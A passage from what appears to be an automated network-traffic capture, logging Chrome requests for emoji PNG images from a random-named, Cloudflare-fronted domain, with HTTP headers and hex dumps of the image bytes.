                                  2025-01-12 00:04:01 UTC1369INData Raw: b3 dd ac 6c f8 ac f9 61 49 a4 1d 20 0b c7 84 d3 b4 7a 61 ad c0 a1 16 8f 16 88 4a 72 7f 1f 78 f3 10 30 12 5d b0 db 7d 8c cb 6e cf e9 9d 21 50 12 8e 0b 58 0b 55 21 2a 09 aa f1 23 26 32 72 e0 57 af 02 a3 e1 4a b7 99 0a 33 ee 0b 15 5d 57 4e 07 d6 30 4b ac d0 ea 74 c4 0d 67 f8 4c 80 ec 42 77 d7 e8 b5 9b 4d c5 e8 34 4f 07 4a b0 46 5a f1 73 4b 2b 01 bb 6f 36 f2 e7 9e 62 b4 8f 5c 8a b2 3f f6 cc 92 ec ea cd c0 a2 da 39 0d c8 03 ad 16 c4 6c 63 63 ce c5 d9 51 8f e0 fd a3 c0 2b 03 e0 7c c4 7f ab d2 16 9b 95 94 7d ac a9 9e 36 82 a0 90 04 1a 97 89 2d ad 35 d5 0a 33 7a e0 9d a3 2d 36 81 97 a2 11 86 61 23 ac 6b cc 59 3d fd 19 04 0d 5b 8c d7 e0 8e a2 aa 46 93 19 65 8b 9f 1c 0f 64 59 bf 0b 65 b1 6d 28 a7 97 04 16 2d 13 55 55 53 8f b4 78 f4 c0 9b 87 80 6c aa d9 dc 58 59 45
                                  Data Ascii: laI zaJrx0]}n!PXU!*#&2rWJ3]WN0KtgLBwM4OJFZsK+o6b\?9lccQ+|}6-53z-6a#kY=[FedYem(-UUSxlXYE
                                  2025-01-12 00:04:01 UTC1369INData Raw: 7f f3 ee c7 6f f3 6c 38 55 a9 2c 04 16 4a bd 8e a2 97 9c 56 87 77 82 46 0f 20 07 f7 78 5c a2 d0 a8 a7 49 0f 85 78 83 a0 17 8e ee c0 f4 31 c0 a3 2f b4 47 70 80 79 ab bd bb bb db eb b6 ab 5d bd a3 96 73 b5 04 41 d3 f1 a2 ac 09 c3 01 34 f7 3c 1c c3 68 53 77 00 0c 98 c0 e8 d1 2b 01 4f 4c e0 f6 c1 95 80 11 01 37 4a 3f 89 cd 47 0b 0b 4d 71 e9 7c a6 ad 1b 6a c2 5a d0 35 ad 16 6f c9 83 8e 40 2e 9f cd 27 28 fa c0 e7 35 7d d3 91 57 6f 7d a0 8e bc 0b f0 c1 eb 0e d1 2f 47 fd 4c d8 bf bc d1 6e cf 38 dc 0e 77 b1 50 ce 63 c9 56 23 6b 8d 43 60 02 d1 be a1 41 a8 57 f1 93 80 c3 7b 33 eb e8 de cc f6 8b 23 d7 52 46 f0 1a 22 1a 8d b8 36 7a bb 5d 9f 73 3a 70 ce eb 26 dc e7 27 28 12 c7 e2 12 a8 9b 40 10 27 6b b2 dc 88 91 9e 57 80 b3 d1 97 6e 1e 1d 73 b1 e7 8d 81 bf bb 8f 80 77
                                  Data Ascii: ol8U,JVwF x\Ix1/Gpy]sA4<hSw+OL7J?GMq|jZ5o@.'(5}Wo}/GLn8wPcV#kC`AW{3#RF"6z]s:p&'(@'kWnsw
                                  2025-01-12 00:04:01 UTC168INData Raw: 52 59 7a 80 72 99 f0 19 87 9f 25 2c 7c 97 94 2c fc 26 1d 8f 6a a2 5f 88 60 9c 16 85 ae 6d e9 ea fd c7 36 fd 70 e7 2a 1c 19 43 79 c3 9c 6d b1 0e 15 46 a3 ca 4e c9 d4 b0 a1 8f 95 62 d0 55 a2 a0 8c c9 49 f5 fe 29 f2 5d 9b 7f a5 8f e7 13 af 52 3a 4b 21 c0 7c cf 99 b5 cc 82 a6 e4 ff b4 53 07 19 00 c3 50 14 45 5b 4a 55 e9 a0 4a 08 a5 f1 f9 fb 5f 62 43 16 91 c9 b9 ce 02 de e8 2d 53 5b f7 73 dc 7c cb cc 88 d6 fb 6a df 35 ce 03 00 00 00 00 e6 f7 03 f5 b8 7f c8 aa 25 6a 0d 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: RYzr%,|,&j_`m6p*CymFNbUI)]R:K!|SPE[JUJ_bC-S[s|j5%jIENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  97192.168.2.650012172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC370OUTGET /img-apple-160/1f1e6-1f1f8.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC897INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:00 GMT
                                  Content-Type: image/png
                                  Content-Length: 5565
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-15bd"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DeT0aSrO4voIuSD6UWAGWDeoVfFutPBsDOKkjlJo5yF%2B0wFEEjE4y780FjtRReySWVG0z%2F6hZY1dd3FCoJi3CiYlDz6YmTppj0aUD9nBA89ess5nmNcvPivpLN1E59ah7D%2Br8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3020a56f5f8-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1468&min_rtt=1466&rtt_var=554&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=1966329&cwnd=122&unsent_bytes=0&cid=b72715e22b43c4f7&ts=213&x=0"
                                  2025-01-12 00:04:01 UTC472INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 14 11 38 69 6c 8f 56 53 76 0c 0e 37 67 6a 8e 0d 10 38 63 65 89 10 12 3b 6d 6d 8e 0e 11 39 a8 a8 a8 7e 25 2f 5f 62 86 0b 0e 37 02 06 39 3d 30 58 67 6a 8e 0d 0e 37 10 12 3b 0a 0d 35 61 63 87 0e 11 3a 6a 6d 90 52 4f 73 15 12 39 61 63 87 0d 0f 38 09 0b 34 6a 6c 90 3a 3d 67 61 63 87 0f 12 3b 6a 6d 90 04 06 30 ff ff ff fe ff ff fe fe ff fd fe fe fa ff ff fc fc fd fb fc fc fa fb fb f9 f9 f9 f7 f7 f7 f4 f5 f5 f3 f3 f3 f1 f1 f1 ee f0 f0 ed ee ee f5 e8 ea ea eb ec e8 e8 e8 e5 e8 e9 f3 df e1 e5 e5 e6 e8 e0 e1 e2 e2 e2 df e0 e0 ef d6 d8 dd de de dc dc dd da db db d9 d9 d9 d8 d8 d8 ea cd d0 d6 d6 d6 d4 d4 d4 d2 d2 d2 ce ce ce e6 c2 c6 cb
                                  Data Ascii: PNGIHDRPLTEGpL8ilVSv7gj8ce;mm9~%/_b79=0Xgj7;5ac:jmROs9ac84jl:=gac;jm0
                                  2025-01-12 00:04:01 UTC1369INData Raw: 39 6e 56 1a 4f 52 7c 97 42 10 4d 50 85 73 4b 35 91 33 56 b5 26 35 8b 41 16 aa 29 39 a1 2c 3f 4a 4d 79 92 3d 0c b2 22 31 46 49 83 7f 30 5a 8b 2c 4a ad 1f 2e 8b 37 06 42 45 78 a1 22 33 83 38 0d 6d 3d 1f 3e 42 80 6d 30 60 a9 1b 2a 86 32 02 87 26 3c 3d 41 73 a7 16 25 a2 18 26 76 33 0c 56 30 68 98 1a 2a 37 3b 7e 7b 2e 02 35 39 74 6c 24 4f 9e 13 22 6d 2f 0a 72 2b 03 30 34 7b 8a 16 26 59 31 1b 4e 28 64 98 0f 1e 7e 18 33 31 34 6b 3c 2b 70 2d 31 74 69 28 02 55 21 56 62 28 06 2a 2e 78 27 2c 7a 27 2c 79 27 2c 78 29 2c 6f 63 24 00 70 16 23 25 2a 78 25 2a 76 20 2b 7b 59 23 04 5f 15 3c 23 28 76 22 27 72 23 27 6b 42 1b 55 20 25 73 22 25 65 1f 24 71 5d 15 17 1d 22 70 1c 21 6d 1f 21 5f 4c 1c 02 1a 1f 6c 1b 1f 66 18 1d 6b 1b 1e 59 16 1b 69 16 1b 61 34 10 48 19 1c 51 23 15
                                  Data Ascii: 9nVOR|BMPsK53V&5A)9,?JMy="1FI0Z,J.7BEx"38m=>Bm0`*2&<=As%&v3V0h*7;~{.59tl$O"m/r+04{&Y1N(d~314k<+p-1ti(U!Vb(*.x',z',y',x),oc$p#%*x%*v +{Y#_<#(v"'r#'kBU %s"%e$q]"p!m!_LlfkYia4HQ#
                                  2025-01-12 00:04:01 UTC1369INData Raw: 30 cb 34 14 3b 07 08 9d 42 4b 64 21 20 81 9c 09 04 a5 00 45 b8 e4 10 3f 61 90 a7 81 1a e3 d8 48 ea 7b 6d a2 1d 80 db 56 63 63 b3 9b 70 4a 09 46 c0 8c 11 e8 6c f0 55 2b 57 fb e4 5c 20 34 14 32 68 69 be 26 80 34 82 f1 5f 4c 34 00 28 aa 80 14 2c 83 1e 03 c7 b6 49 5e af be df 07 05 9c 01 ef 9d fa 5a 9f 32 0e 8a 1c 08 02 c8 32 42 c7 ad 48 cf ad 55 17 97 bf f7 44 58 e7 00 35 00 43 84 86 96 50 18 be 44 62 0e 8f 9e 0c 4b e5 8f 09 60 0a 93 d3 bc f5 fd 08 dc f8 e4 f6 56 dd 67 0c 84 c1 08 41 15 ac da 2b cd 70 e5 a1 5b 39 70 5d a0 f6 e7 af db dc 3e 1f a8 50 b0 b4 2c 76 0b a5 82 9a 06 d4 48 cf e4 51 0a 8a 8a b7 bf d1 08 39 a3 18 01 d5 c2 dd cd f2 9d 95 8f dd 49 3a 22 5d ae b5 81 c8 27 5f 7f d3 b9 00 50 01 43 c3 45 80 1a 67 00 35 9c 21 0f a0 ac bc df 59 6d 6a 46 09 4c
                                  Data Ascii: 04;BKd! E?aH{mVccpJFlU+W\ 42hi&4_L4(,I^Z22BHUDX5CPDbK`VgA+p[9p]>P,vHQ9I:"]'_PCEg5!YmjFL
                                  2025-01-12 00:04:01 UTC1369INData Raw: 75 07 0b de 16 b9 e7 f6 3a 92 52 00 4b 9f 7f b1 b3 74 f7 47 0e 1e 44 d8 79 fa 5f 7b 24 23 76 b5 d4 5b 08 9a ee a5 81 5e fd 49 00 13 1b 6b 1b db 5d 70 40 5f 0c 98 bd c8 df a2 b2 74 5f ee 69 4a 28 01 90 3d f7 ab 35 5d ed 84 70 17 11 ff dd 7f 4a 0a 25 33 b6 e4 b4 a4 7d 29 20 b2 77 eb 6d d3 41 60 23 5e df da f2 29 03 f4 05 81 ea f6 a3 68 57 d8 0b 07 75 46 08 72 20 83 fa cc 2b 2b f5 c8 81 bb 1c 55 5f 7b 73 95 42 29 9d 65 60 c2 ba 04 30 e9 34 f7 fa b0 86 43 dc 9d f5 8d dd 88 13 e0 e2 40 fd 91 ec e6 52 67 69 6d 53 e0 18 28 5f fe 4d ba 37 04 06 fa 1b ef 70 03 d4 20 b3 01 21 a1 72 5d 9c 58 48 72 1d d6 9b ab 2d 49 09 f4 2c 40 f2 a2 5a 41 bf b9 c7 e8 18 88 4f 7f 01 4d 38 58 58 4e 57 bf de 62 98 1d 98 13 bc 8e 6c ef c5 18 85 cb c1 f0 59 57 33 68 cc 06 54 f7 3e b2 d5
                                  Data Ascii: u:RKtGDy_{$#v[^Ik]p@_t_iJ(=5]pJ%3}) wmA`#^)hWuFr ++U_{sB)e`04C@RgimS(_M7p !r]XHr-I,@ZAOM8XXNWblYW3hT>
                                  2025-01-12 00:04:01 UTC986INData Raw: e2 28 42 01 3d e5 a4 d4 01 97 5e e8 0d 94 61 9a 81 71 03 cc 79 45 85 89 86 be 2e 60 0a f3 3d c7 fc 30 a3 73 68 ee c4 04 94 9a 67 87 db 40 d8 48 fc 5d df 03 15 c8 81 a6 53 1b 86 c6 80 a7 b3 1c 68 db 33 03 91 9d 0d 1c cf 76 6a a2 09 60 a4 d0 e9 11 c6 95 e7 a0 e6 f8 80 68 71 60 f7 60 bf dd 53 bc 18 08 19 2a 74 0e d4 8a 9a 85 3d 57 9d c8 39 7b 42 bb 88 f1 60 d8 a0 ed 38 94 60 b0 41 29 6c c0 42 85 e3 f0 e9 41 bb 1f 31 71 62 ed 96 56 05 f0 8a 73 75 17 02 0e 0b 67 9c ba 7f 14 45 89 a7 c0 87 40 0e 38 dc ed bf d5 d8 f1 15 63 05 70 20 1c 00 98 b8 7e 20 c1 c9 08 50 c6 91 b5 f3 6b a7 56 30 55 1e ae c0 dc 7f 7d bf 1d 32 3e 65 79 de 75 cc b8 4f b1 15 40 c2 c1 41 29 08 0f 3a bd 20 8e c1 73 20 e0 d8 f1 0f d7 f7 83 8c 17 ff 08 af 11 28 52 98 4c 07 16 6b 58 73 a5 a5 3a 9b
                                  Data Ascii: (B=^aqyE.`=0shg@H]Sh3vj`hq``S*t=W9{B`8`A)lBA1qbVsugE@8cp ~ PkV0U}2>eyuO@A): s (RLkXs:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  98192.168.2.650011172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC608OUTGET /img-apple-160/1f1e6-1f1f7.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC896INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:01 GMT
                                  Content-Type: image/png
                                  Content-Length: 5126
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-1406"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=66WruMHWwYKsDTfn%2BSJiZ7eHc4l9FGZZvRkaAV0GwNGXriRPjzuGwre%2FIb2Xa4B5rUHXXsA5sgDW6RLrcvISwrgeQXB665riFfDgmG5bLylPM2hJFq0ABWou9R4KeKBPOFBvMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3020ef6f5f6-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1470&rtt_var=573&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1186&delivery_rate=1874197&cwnd=190&unsent_bytes=0&cid=772ac2021cec609a&ts=685&x=0"
                                  2025-01-12 00:04:01 UTC473INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 42 61 7b 43 61 7c 45 64 81 4e 71 91 55 7b 9e 5b 83 a9 60 89 af 60 8b b3 61 8c b4 62 8d b5 62 8e b7 63 8f b8 64 90 b9 65 91 ba 66 92 bb 67 93 bb 68 94 bd 69 95 be 6a 96 bf 6b 97 c0 6c 98 c1 6d 99 c2 6e 9a c3 6f 9b c4 70 9c c5 70 9d c7 72 9e c7 72 9f c9 74 a0 c9 75 a1 cb 76 a2 cb 77 a3 cc 79 a4 cd 79 a5 cf 7a a6 cf 7b a7 d1 7c a8 d1 7d a9 d2 7e aa d3 7f ab d4 7f ac d5 80 ad d6 82 ae d7 83 af d8 83 b0 d9 84 b1 db 86 b1 d9 86 b2 db 87 b3 db 87 b3 dc 88 b4 dd 88 b5 de 89 b6 de 89 b6 df 7b ad db 77 aa d9 be d6 ec ac ca e6 95 bc e0 a1 c3 e2 ff ff fb f7 f7 f8 e6 ef f7 cf e1 f0 dc e7 f1 ee f4 f9 dc eb f8 e9 f1 f8 d5 e3 f0 c7 da eb b9
                                  Data Ascii: PNGIHDRPLTEGpLBa{Ca|EdNqU{[``abbcdefghijklmnopprrtuvwyyz{|}~{w
                                  2025-01-12 00:04:01 UTC1369INData Raw: e8 e8 e8 e7 e7 e7 e7 e6 e6 e5 e5 e5 e3 e3 e3 e2 e2 e2 e0 e0 e0 de de de dd dd dd dc dc dc da da da d9 d9 d9 d8 d8 d8 d7 d7 d7 d6 d6 d6 d3 d3 d3 cf cf d0 c6 c6 c6 ba ba ba e1 e1 e1 db db db d3 aa 83 ee e6 dd f2 e9 e2 d8 b0 86 e7 cc ae e4 c6 a6 e2 c1 9e eb d8 c5 f7 f2 ed dc ae 76 cd 9a 66 82 ac d4 88 b5 df 85 b4 de 86 b3 dc 73 a6 d5 71 a3 d2 9a 9f a4 b7 b2 ae 98 97 97 92 92 92 94 94 93 6d 7c 89 49 69 85 5b 76 8f 68 81 98 70 88 9e 74 8d a4 79 91 a7 7c 97 b0 83 99 ac 83 9b b1 89 9e b2 8d a3 b7 90 a7 bc 94 a9 bc 96 ab be 8d a2 b6 8b 9f b3 8c a1 b4 8f a3 b7 8e a3 b6 90 a5 b7 8e a1 b2 93 a7 ba 4f 69 82 4b 62 78 46 5e 74 3d 54 6a 39 50 66 41 59 6f 3f 56 6c 40 57 6c 3e 55 6b 3f 57 6d 3d 55 6b 40 58 6e 40 57 6d 3f 56 6c 39 50 66 36 4d 63 39 51 68 3d 55 6c 40 5a 71
                                  Data Ascii: vfsqm|Ii[vhpty|OiKbxF^t=Tj9PfAYo?Vl@Wl>Uk?Wm=Uk@Xn@Wm?Vl9Pf6Mc9Qh=Ul@Zq
                                  2025-01-12 00:04:01 UTC1369INData Raw: 6a e8 7f 38 74 69 92 a1 18 45 c0 75 8a bb 4f de cd 6f ef 72 01 fc ee 10 00 7b 11 42 60 8e 95 dc 22 21 6a 14 04 63 97 43 34 b4 86 29 0a 0e 78 8a d5 07 93 4c 42 67 40 80 60 07 f0 12 12 18 48 20 a2 96 d4 17 6c 80 88 94 cf 60 20 54 08 a6 32 83 27 41 7b d9 5b aa 13 8c 1f 96 37 b9 64 18 ea 6b c5 26 a5 5e 08 f3 be 79 f5 19 4c 75 70 50 99 71 50 23 4f f1 d5 82 46 09 29 3d 7b 1e b2 fc b8 64 21 b6 54 13 00 45 28 49 a5 e5 34 9d 33 63 00 ea 77 c2 29 51 29 a8 74 09 47 49 59 00 28 01 24 9c 41 6e 12 d7 24 85 dd 63 af 7a 41 10 e0 12 e9 26 20 d2 90 44 41 d4 cc a4 8a af 12 2a 52 15 96 48 ad a0 c0 31 21 a8 0e 80 14 21 cd cd 8c c1 61 d3 fe b9 0a 23 29 8d 4a a1 ab 4b 71 da ae ca 00 54 e7 08 45 ca bf a0 82 92 93 6a 23 58 fe a9 e4 e4 d4 1e a5 b9 b9 39 09 8a 6e d4 a2 42 4c 5c 75
                                  Data Ascii: j8tiEuOor{B`"!jcC4)xLBg@`H l` T2'A{[7dk&^yLupPqP#OF)={d!TE(I43cw)Q)tGIY($An$czA& DA*RH1!!a#)JKqTEj#X9nBL\u
                                  2025-01-12 00:04:01 UTC1369INData Raw: 14 db d7 9b 8e cf b8 27 63 a8 06 a0 58 6b ba 3b 5d 6a da 48 40 6a 60 44 64 cd a9 17 09 7d 29 a8 8a 19 0c 9a 98 61 2c dd 3d 15 84 8a f4 4b b0 22 69 db 93 54 d9 9f ae 0e a0 0d 2f 84 9c 74 29 4d ef 04 18 12 58 76 5e 9c f2 c3 cf a6 6d 75 9c 24 92 7e aa 11 7e 52 da ed 05 f6 f5 5b d3 27 be e7 b3 30 9a bd 17 df 43 a8 3c 50 cd ac 64 c5 2f a5 3d ed fa 85 5d 5d 17 ba 99 6c f1 bb 3a 70 af 49 85 81 c6 98 cb cd 81 98 4e d7 2d 4c aa fa a5 b6 ba 90 66 52 82 b2 dd 7e a5 a3 4a ae d6 56 7e 06 41 34 6b b6 98 89 9b 54 bc 43 1c a2 97 56 23 f9 d6 b9 1e 6e 80 19 1d 47 ff b9 e7 cd ee 13 38 48 8a 11 4e e3 56 dc 6b 59 39 20 ec 0c a2 9c 4d 85 f7 64 a2 8b 0d 69 7a 9d c8 4e ee e5 3a 1b 80 11 24 fc c4 99 71 39 f3 f0 58 1d c6 41 3a 18 09 73 65 17 40 b5 13 02 b4 0b 21 95 00 02 de 8c b4
                                  Data Ascii: 'cXk;]jH@j`Dd})a,=K"iT/t)MXv^mu$~~R['0C<Pd/=]]l:pIN-LfR~JV~A4kTCV#nG8HNVkY9 MdizN:$q9XA:se@!
                                  2025-01-12 00:04:01 UTC546INData Raw: 70 53 cd e8 20 d1 53 9b 35 6b 93 08 09 75 47 ef 9b c0 c0 48 6d 2d 4b b3 bb c0 a3 6d ca 05 59 dd 6b 2b fb 70 03 9d 20 e0 30 c3 61 30 1a 41 ec dd b7 00 43 bc 73 0c af 5e 4a 8b b0 59 16 74 66 5d 9b 04 09 21 ba 71 80 dd 1b f9 f7 60 71 ce b9 76 56 83 04 56 0f 96 08 ae ce ad ee 69 6b de 70 21 7c 16 45 4b 05 e3 be 49 a4 9c 10 36 b6 dc 54 44 ed 16 89 08 5f d0 05 6e cf 58 9e 74 a4 c1 90 75 66 d3 dd 69 ba 35 65 3b fa 8e d3 06 66 a5 82 2d 4b cd 5a e9 ca 3c ce 19 b8 7e ae 07 3e 51 6e 30 40 25 f0 5a 20 54 5b 47 14 6e ae 1d a2 06 08 bb 39 23 3d fb a3 a4 cd 05 02 cb 0b cb 0b 0c 71 c9 99 59 e7 91 20 39 6d 76 a3 54 90 b4 bd 27 6b f4 14 99 37 17 fa 39 36 0a 8e 20 39 38 48 07 81 33 a8 b6 99 58 86 44 f3 3e 3b 2d ba 89 b5 86 24 ef 0f 10 ac d8 86 8b b5 ba 36 66 0b c3 5f 4a 05
                                  Data Ascii: pS S5kuGHm-KmYk+p 0a0ACs^JYtf]!q`qvVVikp!|EKI6TD_nXtufi5e;f-KZ<~>Qn0@%Z T[Gn9#=qY 9mvT'k796 98H3XD>;-$6f_J


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  99192.168.2.650010172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC608OUTGET /img-apple-160/1f1e6-1f1f2.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC901INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:01 GMT
                                  Content-Type: image/png
                                  Content-Length: 3907
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-f43"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=waMK5%2FueMbHNWEpu5fQHLzwicZPImOl2XaGjqsORfmOT6O%2Fiw5sQqPE2A5gdy%2FxflvsiAIDiWZJbxUts8DPWXHVBc1fAdjlwC53CkjWsr4bz4vHDH2V4MRolTCf1z9Z%2BfC9mVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3020f4143c7-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=13211&min_rtt=2180&rtt_var=7556&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1186&delivery_rate=1339449&cwnd=219&unsent_bytes=0&cid=d03a1f5ced446d78&ts=718&x=0"
                                  2025-01-12 00:04:01 UTC468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c a8 5e 42 b8 5d 54 7e 49 0d 9c 56 32 7c 4e 0a ca 68 68 ca 67 67 7c 4f 0c c2 5b 5b 7c 4f 0b a4 6b 16 aa 17 17 18 17 77 02 17 86 0e 11 7e cb 69 69 bd 50 50 7b 4d 09 c4 63 63 8e 56 03 9f 0c 0c 92 00 00 07 02 5f 00 00 71 a8 2c 2c 72 45 02 82 54 0f ca 68 68 7e 51 0d c4 61 61 78 4a 07 84 57 13 cc 6a 6a 78 4a 07 75 47 04 c3 61 61 81 54 10 88 59 13 7a 4d 0a 84 57 13 a9 2f 2f ce 6b 6b c1 5d 5d 75 48 04 ff b8 11 ff b1 13 ff ac 1c fe a7 25 fd a6 25 ff a9 08 fb a5 24 fa a4 24 f9 a3 24 f8 a2 22 ff a2 06 f7 a1 20 f4 a1 24 f5 9f 1e fe 9f 05 f3 9e 1e f1 9c 1b ed 9c 24 fa 9a 00 ef 9a 1b f0 99 18 ed 98 17 e6 97 24 eb 95 15 e8 95 17 f2 93 00 e9
                                  Data Ascii: PNGIHDRPLTEGpL^B]T~IV2|Nhhgg|O[[|Okw~iiPP{MccV_q,,rEThh~QaaxJWjjxJuGaaTYzMW//kk]]uH%%$$$" $$$
                                  2025-01-12 00:04:01 UTC1369INData Raw: 5a 02 f9 21 21 f5 22 22 f6 1f 1f b5 3a 3a dc 29 29 ff 1c 0e 86 58 13 ce 2e 2e 6a 4f 88 8f 56 02 f3 1d 1d ea 20 20 da 23 34 6f 4d 74 85 55 0c f2 1a 1a ef 1a 1a d0 27 28 ef 17 17 82 51 08 df 1d 1d ec 16 16 fe 10 03 7d 4e 08 d2 1e 20 e9 14 14 ba 21 4c b3 2a 2a ea 12 12 e6 12 12 d5 18 1a 6d 44 48 7a 4a 03 d9 15 15 e0 12 12 e7 0f 0f f4 09 02 e4 0e 0e 74 46 02 93 22 68 e1 0c 0c cd 14 16 4e 3c 93 d9 0d 0d df 0a 0a bc 15 18 ea 02 00 dc 07 07 d3 0a 0b d9 06 06 57 36 5d d8 03 03 68 22 83 ab 15 16 a6 17 17 d5 02 02 40 2e a0 d2 02 02 cd 02 02 92 0e 45 c4 01 03 b8 01 05 26 26 b7 38 21 9f 25 25 b6 a7 01 0a 23 23 b5 22 22 b3 38 25 69 1b 23 bd 45 18 85 20 20 b2 1f 1f b0 0a 25 c8 6a 09 54 79 06 36 1d 1d ae 93 00 00 1b 1b ac 0f 1b c1 18 18 aa 17 17 a8 15 15 a6 07 18 ba 16
                                  Data Ascii: Z!!""::))X..jOV #4oMtU'(Q}N !L**mDHzJtF"hN<W6]h"@.E&&8!%%##""8%i#E %jTy6
                                  2025-01-12 00:04:01 UTC1369INData Raw: a6 14 da 14 a6 a0 00 63 e8 56 a7 2d 2b bc 61 9f 73 74 58 58 cf 81 5b e5 13 93 dd 13 ec 6b 89 09 18 8b 06 3a 3a 53 03 96 84 be 40 2d 5b 46 d7 13 9c e6 ee a9 6d be 98 a5 cf 9a b8 ad 68 1a 61 38 17 63 b8 80 67 25 0b e0 89 fb fd 27 98 b6 ef f8 c0 c6 2d e9 56 4f 21 20 81 d5 86 58 c2 1d 1b 06 7a a0 5d 79 31 b7 46 5c 4e b0 e9 89 b1 ce 71 c7 ac b9 f5 12 6f be ea 7b 5f 0b 6b ec ae 63 9f 02 0e cb 6d 52 fb fb ec d0 df f0 60 2d fb e4 77 9c bb dd 1b b8 1b 7b db dc d0 31 7b a7 f7 e0 d6 0b 6a 79 3c dc e9 12 68 72 98 3d 82 b6 25 76 08 50 02 d6 98 dd c0 bb 0f 6d b7 4f cd 31 4c a0 eb 38 ce 8f a2 8b 23 09 70 4e 8a 25 f8 cb 8e aa 14 dc ad 80 80 63 4b 0d 7b a4 30 c4 d2 03 0e a7 4c 4f e6 4f 32 20 05 48 e0 43 40 ae 3b 3b 95 ca 56 5d 73 71 28 61 27 d0 f7 bb 41 a6 03 08 0c e4 06
